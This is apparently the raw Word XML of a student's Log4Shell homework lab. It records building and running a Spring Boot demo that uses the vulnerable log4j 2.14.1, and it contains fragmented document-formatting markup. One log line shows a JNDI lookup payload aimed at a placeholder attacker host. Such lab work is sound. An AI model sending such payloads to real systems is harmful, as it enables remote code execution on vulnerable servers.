    <w:p w14:paraId="60DAB8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__pycache__    build_clib.py   dist_info.py      install_egg_info.py   py36compat.py            sdist.py      upload_docs.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E55C5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alias.py       build_ext.py    easy_install.py   install_lib.py        register.py              setopt.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171485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bdist_egg.py   build_py.py     egg_info.py       install_scripts.py    rotate.py                test.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09487D3C" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF914E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./venv/lib/python3.9/site-packages/setuptools/command/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA2CA6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    build_py.cpython-39.pyc      install_egg_info.cpython-39.pyc  saveopts.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C13B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alias.cpython-39.pyc       develop.cpython-39.pyc       install_lib.cpython-39.pyc       sdist.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CCE0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bdist_egg.cpython-39.pyc   dist_info.cpython-39.pyc     install_scripts.cpython-39.pyc   setopt.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8594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bdist_rpm.cpython-39.pyc   easy_install.cpython-39.pyc  py36compat.cpython-39.pyc        test.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0415DE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build_clib.cpython-39.pyc  egg_info.cpython-39.pyc      register.cpython-39.pyc          upload.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56076D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build_ext.cpython-39.pyc   install.cpython-39.pyc       rotate.cpython-39.pyc            upload_docs.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76124CAE" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3714B90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./venv/lib/python3.9/site-packages/setuptools/extern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A36B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__init__.py  __pycache__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE15AF9" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336BFC8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./venv/lib/python3.9/site-packages/setuptools/extern/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C329B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__init__.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A255D66" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367D0A2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./venv/lib/python3.9/site-packages/setuptools-59.6.0.dist-info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FBCD9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INSTALLER  LICENSE  METADATA  RECORD  REQUESTED  WHEEL  entry_points.txt  top_level.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580BF08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java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16511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Exception in thread "main" java.lang.ClassNotFoundException: com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C30C89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java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C841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java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:592)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4B0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org.springframework.boot.loader.LaunchedURLClassLoader.loadClass(LaunchedURLClassLoader.java:151)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D8EE7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java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:525)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124240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java.base/java.lang.Class.forName0(Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7EBB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java.base/java.lang.Class.forName(Class.java:467)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA8E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org.springframework.boot.loader.MainMethodRunner.run(MainMethodRunner.java:46)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8CD46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org.springframework.boot.loader.Launcher.launch(Launcher.java:108)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE140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org.springframework.boot.loader.Launcher.launch(Launcher.java:58)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F13B78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org.springframework.boot.loader.JarLauncher.main(JarLauncher.java:88)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42754FA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java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C77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Exception in thread "main" java.lang.ClassNotFoundException: com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DDD8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java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F851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java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:592)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A8D7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at org.springframework.boot.loader.LaunchedURLClassLoader.loadClass(LaunchedURLClassLoader.java:151)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C1EED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java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:525)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF3809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java.base/java.lang.Class.forName0(Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9847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java.base/java.lang.Class.forName(Class.java:467)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF06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org.springframework.boot.loader.MainMethodRunner.run(MainMethodRunner.java:46)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDBA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org.springframework.boot.loader.Launcher.launch(Launcher.java:108)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197C8B5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org.springframework.boot.loader.Launcher.launch(Launcher.java:58)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9BFC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at org.springframework.boot.loader.JarLauncher.main(JarLauncher.java:88)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3EF9D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find src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540401C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find: ‘src’: No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C40F9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mkdir -p src/main/java/com/example/log4shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54981DA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 Log4ShellDemoApplication.java src/main/java/com/example/log4shell/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB76AA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mv: cannot stat 'Log4ShellDemoApplication.java': No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983B60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 Log4ShellDemoApplication.java src/main/java/com/example/log4shell/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBF6B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mv LogController.java src/main/java/com/example/log4shell/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336413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mv: cannot stat 'Log4ShellDemoApplication.java': No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213B0A3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mv: cannot stat 'LogController.java': No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710411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find . -name "Log4ShellDemoApplication.java"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4417080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./SRC/main/java/com/example/log4shell/Log4ShellDemoApplication.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C333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find src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66693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src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDEB2A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src/main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6678848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src/main/java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388079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src/main/java/com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B82FB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src/main/java/com/example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0A6FE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src/main/java/com/example/log4shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7774634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src/main/java/com/example/log4shell/Log4ShellDemoApplication.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712BE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src/main/java/com/example/log4shell/LogController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353022B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src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B15DF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src/main/resources/log4j2.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396E942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src/main/resources/application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6235E08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mvn clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F35E6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Scanning for projects...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E797A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560151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---------------------&lt; com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0217173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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE1468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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5ABA4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6A9FAFC"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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E555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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEBA7A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4D8B26A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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E56B9F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10294F1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1BCCD44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Copying 1 resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF9030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Copying 1 resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF6362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289483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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A561F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Changes detected - recompiling the module!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB383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Compiling 2 source files to /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69984B6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2919BD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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77135BE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resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB9382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Using 'UTF-8' encoding to copy filtered properties files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC39F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skip non existing resourceDirectory /home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72386DA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79D29C7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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC97F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[INFO] No sources to compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102C94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9473EB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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3EBF6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No tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4113E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1AA6589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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA09AF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Building jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E663CA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332297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 spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266E714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Replacing main artifact with repackaged archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FBCA7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5792263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BUILD SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD20698"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4053C88A"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Total time:  4.768 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69412F5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Finished at: 2025-05-29T00:50:28Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C3362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[INFO] ------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001BD40"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(venv) [ec2-user@ip-172-31-46-85 log4shell-homework]$ java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC631D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SLF4J: Class path contains multiple SLF4J bindings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772ED0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SLF4J: Found binding in [jar:file:/home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar!/BOOT-INF/lib/logback-classic-1.2.6.jar!/org/slf4j/impl/StaticLoggerBinder.class]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFC235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SLF4J: Found binding in [jar:file:/home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar!/BOOT-INF/lib/log4j-slf4j-impl-2.14.1.jar!/org/slf4j/impl/StaticLoggerBinder.class]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4E63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SLF4J: See http://www.slf4j.org/codes.html#multiple_bindings for an explanation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FF65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SLF4J: Actual binding is of type [ch.qos.logback.classic.util.ContextSelectorStaticBinder]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A29D8" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA40CD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   ____          _            __ _ _</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728CCD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 / ___'_ __ _ _(_)_ __  __ _ \ \ \ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC0E2F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 )\___ | '_ | '_| | '_ \/ _` | \ \ \ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CF99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  ___)| |_)| | | | | || (_| |  ) ) ) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F44CFE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  |____| .__|_| |_|_| |_\__, | / / / /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE8059E"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 xml:space="preserve"> =========|_|==============|___/=/_/_/_/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192C434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 xml:space="preserve"> :: Spring Boot ::                (v2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D120B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404A0C6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2025-05-29 00:51:20.651  INFO 80951 --- [           main] c.e.log4shell.Log4ShellDemoApplication   : Starting Log4ShellDemoApplication v0.0.1-SNAPSHOT using Java 17.0.15 on ip-172-31-46-85.us-east-2.compute.internal with PID 80951 (/home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar started by ec2-user in /home/ec2-user/log4shell-homework)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9E404"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2025-05-29 00:51:20.660  INFO 80951 --- [           main] c.e.log4shell.Log4ShellDemoApplication   : No active profile set, falling back to default profiles: default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D542F"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2025-05-29 00:51:22.721  INFO 80951 --- [           main] o.s.b.w.embedded.tomcat.TomcatWebServer  : Tomcat initialized with port(s): 8080 (http)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D343C1"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2025-05-29 00:51:22.754  INFO 80951 --- [           main] o.apache.catalina.core.StandardService   : Starting service [Tomcat]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDAEAD2"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2025-05-29 00:51:22.755  INFO 80951 --- [           main] org.apache.catalina.core.StandardEngine  : Starting Servlet engine: [Apache Tomcat/9.0.53]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F84D5"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2025-05-29 00:51:22.881  INFO 80951 --- [           main] o.a.c.c.C.[Tomcat].[localhost].[/]       : Initializing Spring embedded WebApplicationContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47CA9B"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2025-05-29 00:51:22.881  INFO 80951 --- [           main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 2092 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C344D03"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2025-05-29 00:51:24.114  INFO 80951 --- [           main] o.s.b.w.embedded.tomcat.TomcatWebServer  : Tomcat started on port(s): 8080 (http) with context path ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B487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2025-05-29 00:51:24.147  INFO 80951 --- [           main] c.e.log4shell.Log4ShellDemoApplication   : Started Log4ShellDemoApplication in 4.444 seconds (JVM running for 5.267)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9848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2025-05-29 00:53:42.649  INFO 80951 --- [0.0-8080-exec-1] o.a.c.c.C.[Tomcat].[localhost].[/]       : Initializing Spring DispatcherServlet 'dispatcherServlet'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B3B0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2025-05-29 00:53:42.649  INFO 80951 --- [0.0-8080-exec-1] o.s.web.servlet.DispatcherServlet        : Initializing Servlet 'dispatcherServlet'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03843026"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2025-05-29 00:53:42.650  INFO 80951 --- [0.0-8080-exec-1] o.s.web.servlet.DispatcherServlet        : Completed initialization in 1 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0137C28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2025-05-29 00:53:42.702  WARN 80951 --- [0.0-8080-exec-1] .w.s.m.s.DefaultHandlerExceptionResolver : Resolved [org.springframework.web.bind.MissingServletRequestParameterException: Required request parameter 'input' for method parameter type String is not present]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532F5D29"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2025-05-29 00:56:24.312  INFO 80951 --- [0.0-8080-exec-2] com.example.log4shell.LogController      : Received input: $jndi:ldap://attacker.com:1389/a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B15C1BD"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lastRenderedPageBreak/>
        <w:t>2025-05-29 18:47:15.352  WARN 80951 --- [0.0-8080-exec-3] .w.s.m.s.DefaultHandlerExceptionResolver : Resolved [org.springframework.web.bind.MissingServletRequestParameterException: Required request parameter 'input' for method parameter type String is not present]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB65EC7" w14:textId="77777777"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2025-05-29 18:49:49.008  WARN 80951 --- [0.0-8080-exec-4] .w.s.m.s.DefaultHandlerExceptionResolver : Resolved [org.springframework.web.HttpRequestMethodNotSupportedException: Request method 'POST' not supported]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DA845" w14:textId="2B5EE072" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2025-05-29 18:53:07.973  WARN 80951 --- [0.0-8080-exec-5] .w.s.m.s.DefaultHandlerExceptionResolver : Resolved [org.springframework.web.HttpRequestMethodNotSupportedException: Request method 'POST' not supported]</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009B72F7" w:rsidRPr="009B7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3258"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D74E462"/>
    <w:lvl w:ilvl="0" w:tplc="DB587F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F8136E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A943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BD4444"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA9A0354"/>
    <w:lvl w:ilvl="0" w:tplc="DB587FE8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri"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A85E1B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB44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331C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E129B56"/>
    <w:lvl w:ilvl="0" w:tplc="9B36FF3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E772D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BCA83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718F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17686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57769D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8722853E"/>
    <w:lvl w:ilvl="0" w:tplc="56DC90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66145F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A36E300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B6717D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7CC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BC759C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D820DA2"/>
    <w:lvl w:ilvl="0" w:tplc="F77CEE0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="4EA72E" w:themeColor="accent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167B7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25B2791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1746BEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87FC4AF6"/>
    <w:lvl w:ilvl="0" w:tplc="731EE7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1A0AEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B1AE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5A0211"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F4C59BA"/>
    <w:lvl w:ilvl="0" w:tplc="DB587FE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2B347F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2786A950"/>
    <w:lvl w:ilvl="0" w:tplc="F00C7D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6222A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A36E3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9904936">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1167358431">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1567644246">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1422994096">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1773552817">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1861773323">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1050298634">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1785147567">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="633367202">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1306857543">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1483039913">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="98107907">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="413014543">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="810249068">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1821268210">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1265963139">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="210843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385"/>
    <w:rsid w:val="00002456"/>
    <w:rsid w:val="000E2C4A"/>
    <w:rsid w:val="001012E6"/>
    <w:rsid w:val="001C4D3B"/>
    <w:rsid w:val="001D4D30"/>
    <w:rsid w:val="002977F0"/>
    <w:rsid w:val="00335F4E"/>
    <w:rsid w:val="0041296A"/>
    <w:rsid w:val="004A708D"/>
    <w:rsid w:val="004D77D7"/>
    <w:rsid w:val="004E3498"/>
    <w:rsid w:val="005117E7"/>
    <w:rsid w:val="00544288"/>
    <w:rsid w:val="005B7C1D"/>
    <w:rsid w:val="00613B2C"/>
    <w:rsid w:val="00652BFC"/>
    <w:rsid w:val="006A5C0D"/>
    <w:rsid w:val="00790F4A"/>
    <w:rsid w:val="00806B89"/>
    <w:rsid w:val="00975B62"/>
    <w:rsid w:val="009B72F7"/>
    <w:rsid w:val="009E0422"/>
    <w:rsid w:val="009F01AC"/>
    <w:rsid w:val="00A6412E"/>
    <w:rsid w:val="00B11385"/>
    <w:rsid w:val="00B8531C"/>
    <w:rsid w:val="00BE68C4"/>
    <w:rsid w:val="00BF4223"/>
    <w:rsid w:val="00C12E56"/>
    <w:rsid w:val="00CA0277"/>
    <w:rsid w:val="00DB2051"/>
    <w:rsid w:val="00DC19D2"/>
    <w:rsid w:val="00E11CD5"/>
    <w:rsid w:val="00E36C5C"/>
    <w:rsid w:val="00E71719"/>
    <w:rsid w:val="00F11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C368"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3EB4BCA2-B64A-4130-B9C0-F4ACC13A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3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3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3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3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3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3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3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3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385"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00B11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385"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00B11385"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B11385"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00B11385"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
